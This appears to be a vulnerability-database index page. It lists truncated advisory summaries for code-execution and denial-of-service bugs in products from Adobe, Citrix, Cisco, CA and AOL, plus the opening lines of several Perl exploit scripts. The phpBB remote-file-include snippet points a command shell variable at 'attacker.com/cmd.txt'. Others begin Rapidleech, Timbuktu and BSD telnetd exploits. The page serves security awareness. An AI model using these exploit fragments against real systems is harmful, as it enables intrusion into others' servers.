Oracle to release 73 security vulnerabilities security patch update !

Oracle to release 73 security vulnerabilities security patch update ! Oracle plans to release a large number of security patches for its various software products next week, including six bug-fixes for its flagship database software. All told, there will be 73 security vulnerabilities fixed acros...

KLA10435 ACE vulnerability in Adobe Photoshop

An untrusted path was found in Adobe Photoshop. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited on the network via a DLL hijack. Original advisories - Exploitation Public exploits exist for this vulnerability. Related products...

KLA10117 ACE vulnerability in Citrix XenApp Online plug-in

An unspecified vulnerability was found in the Citrix XenApp Online plug-in. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited from the network via a specially designed web site Original advisories Citrix bulletin Related products...

KLA10106 ACE vulnerability in Cisco Secure Desktop

An improperly downloaded files verification vulnerability was found in Cisco Security Desktop. By exploiting this vulnerability malicious users can Execute Arbitrary Code. This vulnerability can be exploited from the network at a point related to Web Install via a specially designed web page...

KLA10148 ACE vulnerability in Quiksoft Easymail Objects

A buffer overflow was found in QuikSoft EasyMail Objects. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited from the network at a point related to the connection method. Original advisories - Related products...

KLA10094 DoS vulnerabilities in CA products

An unspecified vulnerability was found in CA products. By exploiting this vulnerability malicious users can cause denial of service or possibly execute arbitrary code. This vulnerability can be exploited from the network at a point related to arclib via a specially designed RAR archive. Original...

KLA10127 ACE vulnerability in CoolPreviews

An unspecified vulnerability was found in CoolPreviews. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited from the network via a specially designed link. Original advisories security-assessment advisory Related products CoolPreviews C...

SUSE: Security Advisory for glib2 (SUSE-SA:2009:026)

The remote host is missing updates announced in advisory SUSE-SA:2009:026. Copyright C 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software...

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

Exploit for windows platform in category remote exploits ================================================================ Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit ================================================================ !/usr/bin/perl No point in keeping this priva...

Netgear WG102 SNMP Password Leak

Dear all, after informing Netgear about the unsafe handling of passwords on their WG102 Access Points nothing happened for several weeks. To inform other users about the potential threat to their networks I decided to share my findings. WG102 offers the the typical SNMP write & SNMP read communit...

Neostrada Livebox Router - Remote Network Down (PoC)

Neostrada Livebox Router - Remote Network Down PoC Neostrada Livebox Router Remote Network Down PoC Exploit Author: 0in aka zer0in from Dark-Coders Group! Contact: 0in.emailatgmail.com / 0inatdark-coders.pl Site: http://dark-coders.pl Greetings to: All Dark-Coders Members:...

KLA10115 SB vulnerability in Citrix Web Interface

An unspecified vulnerability was found in the Citrix Secure Gateway. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited from the network via a specially designed request. Original advisories Citrix bulletin Related products...

KLA10054 ACE vulnerability in Akamai Download Manager

CRLF injection vulnerability was found in the Akamai Download Manager. By using this vulnerability spiteful abuser can execute arbitrary code. This vulnerability can be exploited from network at point related to unknown. Via specially designed URL. Original advisories vulnerability description...

KLA10192 ACE vulnerability in HP Software Update

An unspecified vulnerability was found in an HP Software Update. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited from the network at a point related to Hpufunction.dll. Original advisories - Exploitation Public exploits exist for th...

KLA10060 ACE vulnerability in Kazaa & Grokster

A buffer overflow vulnerability was found in Kazaa & Grokster. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited from the network at a point related to Altnet Download Manager via a specially designed installation method call. Origina...

KLA10047 ACE vulnerability in AOL AIM

Lack of special tag filtering was found in the AIM. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited from the network at a point related to an embedded Internet Explorer server control via a specially designed message. Original...

timbuktu_sploit.txt

!/usr/bin/perl ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO Timbuktu Pro 8.6.3 Arbitrary File Deletion/Creation Bug & Exploit by titon titonatbastardlabsdotcom Advisory: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 Copyright: c2007 BastardLabs...

rapidleech.txt

Author : CSD Software : Rapidleech Company : Rapidleech Bug : Remote Code execute Exploit : /usr/bin/perl use IO::Socket; $ha=$ARGV0; $pa=$ARGV1; $file="kills.php"; if !$ARGV1 print"\n"; print "+ Coded By Nightmare RedDragon or H3CT0R3 +\n"; print "+ Bug Discovered By Dark L0rD +\n"; print "+ Bla...

BSD (telnetd) Remote Root Exploit

No description provided by source. / 7350854 - x86/bsd telnetd remote root exploit TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be disclosed to third parties,...

phpbbsecurity-rfi.txt

!/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socket =...